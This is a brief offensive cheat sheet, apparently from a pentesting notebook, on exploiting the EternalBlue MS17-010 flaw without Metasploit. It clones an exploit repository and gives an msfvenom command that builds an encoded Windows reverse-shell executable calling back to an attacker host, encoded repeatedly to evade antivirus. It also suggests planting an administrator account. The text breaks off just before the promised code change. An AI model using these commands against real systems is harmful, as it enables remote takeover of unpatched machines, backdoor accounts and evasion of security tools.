MS17-010
EternalBlue MS 17-010 exploiting ways without Metasploit.
With Executable
$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 EXITFUNC=thread -f exe -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -o reverse.exeWith Adding User
If there is an AV, you can not upload executable file. Instead of uploading, you can create an administrator account. Or you can do AV evasion. :)
https://www.exploit-db.com/exploits/42315
Change smb_pwn function content is to below.
Last updated